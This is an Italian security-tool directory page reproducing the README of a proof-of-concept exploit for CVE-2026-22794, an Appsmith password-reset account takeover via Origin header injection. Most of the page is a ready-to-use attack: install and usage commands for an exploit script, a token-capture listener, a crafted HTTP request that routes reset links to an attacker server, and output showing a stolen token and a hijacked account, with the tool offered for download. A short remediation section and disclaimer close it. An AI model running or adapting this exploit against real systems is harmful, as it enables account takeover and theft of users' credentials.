Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22794-POC — 🔴 CVE-2026-22794 - Appsmith Password Reset Account Takeover via Origin Header Injection | PoC Exploit + Nuclei Template | Kitploit
Strumenti/GitHubGitHub/malikhamza7/cve-2026-22794-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingAutenticazione
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - Appsmith Password Reset Account Takeover via Origin Header Injection | PoC Exploit + Nuclei Template

Vedi Repository
77 mesi faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-22794 - Iniezione dell'Header Origin in Appsmith

Python Version CVE License

🔴 Vulnerabilità di Sicurezza Critica

Dirottamento del Link di Reset Password tramite Manipolazione dell'Header Origin

Questo repository contiene una Proof of Concept (PoC) per CVE-2026-22794, una vulnerabilità critica in Appsmith che consente agli attaccanti di dirottare i token di reset password e ottenere il pieno controllo dell'account.

📋 Riepilogo della Vulnerabilità

CampoValore
ID CVECVE-2026-22794
Software InteressatoAppsmith (versioni precedenti alla patch)
Tipo di VulnerabilitàIniezione dell'Header Origin
ImpattoPieno Controllo dell'Account
Punteggio CVSS9.1 (Critico)
Vettore di AttaccoRete
Complessità dell'AttaccoBassa
Privilegi RichiestiNessuno
Interazione dell'UtenteRichiesta (la vittima clicca sul link)

🎯 Descrizione della Vulnerabilità

Appsmith utilizza l'header HTTP Origin senza validazione per costruire gli URL di reset password e verifica email. Il codice vulnerabile assegna direttamente l'header Origin all'URL base di reset password:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

Questo consente a un attaccante di:

  1. Attivare un reset password per qualsiasi indirizzo email
  2. Iniettare un header Origin malevolo che punta a un server controllato dall'attaccante
  3. Catturare il token di reset password quando la vittima clicca sul link
  4. Utilizzare il token per resettare la password della vittima e prendere il controllo del suo account

🔥 Catena di Attacco

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     FLUSSO DELL'ATTACCO                          │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ ATTACCANTE│                    │ APPSMITH │                    │  VITTIMA  │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. Invio email con            │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. La vittima clicca sul link │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. Token catturato!           │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. CONTROLLO DELL'ACCOUNT! ✓  │                               │
       │                               │                               │

📦 Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Installa le dipendenze
pip install -r requirements.txt

🚀 Utilizzo

Verifica se il target è vulnerabile

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

Avvia il server di cattura token

root@kitploit:~
python exploit.py --listen --port 8080

Invia richiesta di reset password malevola

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

Attacco completamente automatizzato

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

Utilizza il token catturato per resettare la password

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 Dimostrazione dell'Attacco

Passo 1: L'attaccante invia una richiesta malevola

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

Passo 2: La vittima riceve un'email con link malevolo

root@kitploit:~
Link di Reset Password: https://attacker-server.com/user/resetPassword?token=abc123xyz...

Passo 3: L'attaccante cattura il token

root@kitploit:~
[+] RICHIESTA IN ARRIVO CATTURATA!
[*] Percorso: /user/resetPassword?token=abc123xyz789...
[!!!] TOKEN DI RESET PASSWORD CATTURATO!
[!!!] Token: abc123xyz789...

Passo 4: Controllo dell'account

root@kitploit:~
[+] CONTROLLO DELL'ACCOUNT RIUSCITO!
[+] La password è stata resettata a: NewP@ssw0rd!

🛡️ Rimedio

Le organizzazioni che utilizzano Appsmith dovrebbero:

  1. Aggiornare immediatamente all'ultima versione patchata
  2. Validare gli header Origin contro una whitelist di domini consentiti
  3. Utilizzare configurazione lato server per generare gli URL di reset password
  4. Implementare verifiche aggiuntive (es. validazione IP, scadenza breve dei token)

Esempio di Codice Sicuro

root@kitploit:~
// ❌ CODICE VULNERABILE
userPasswordDTO.setBaseUrl(originHeader);

// ✅ CODICE SICURO
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// Oppure validare contro la whitelist
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Header origin non valido");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 Struttura del Repository

root@kitploit:~
CVE-2026-22794/
├── README.md           # Questo file
├── exploit.py          # Script exploit principale
├── requirements.txt    # Dipendenze Python
├── LICENSE             # Licenza MIT
└── docs/
    └── technical_analysis.md  # Analisi tecnica dettagliata della vulnerabilità

⚠️ Disclaimer Legale

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi.

  • Utilizzare questo strumento solo contro sistemi di cui si è proprietari o per cui si ha esplicita autorizzazione scritta
  • L'accesso non autorizzato a sistemi informatici è illegale
  • L'autore non è responsabile per qualsiasi uso improprio di questo strumento
  • Seguire sempre le pratiche di divulgazione responsabile

📄 Riferimenti

  • CVE-2026-22794
  • OWASP - Forgot Password Cheat Sheet
  • CWE-346: Origin Validation Error

👤 Autore

Ricercatore di Sicurezza

  • GitHub: @MalikHamza7
  • LinkedIn: Il tuo profilo LinkedIn

📜 Licenza

Questo progetto è concesso in licenza sotto la Licenza MIT - consultare il file LICENSE per i dettagli.


⭐ Se hai trovato utile questo strumento, metti una stella al repository! ⭐

Scarica lo strumento